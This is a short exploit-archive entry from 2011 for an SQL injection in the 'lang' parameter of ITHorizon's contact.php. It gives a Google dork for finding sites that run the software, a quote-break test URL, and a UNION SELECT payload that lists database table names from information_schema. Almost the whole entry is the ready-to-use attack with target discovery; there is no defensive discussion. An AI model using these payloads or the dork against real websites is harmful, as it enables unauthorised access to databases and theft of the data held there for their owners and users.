id: 17076
date: 11/20/2011
title: ITHorizon (lang) SQL Injection Vulnerability
author: CoBRa_21
cves: 

################################################################################################
#  Exploit Title: ITHorizon (lang) SQL Injection Vulnerability
#  Author : CoBRa_21
#  E-Mail : uyku_cu [at] windowslive.com
#  Google Dork : Powered by ITHorizon
#  Script Page : http://www.ithorizon.net/
################################################################################################
#
#  Exploit
#
#  http://127.0.0.1/[PATH]/contact.php?lang=1' SQL
#
#  http://127.0.0.1/[PATH]/contact.php?lang=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
#
#
################################################################################################



#  0day.today [2023-03-24]  #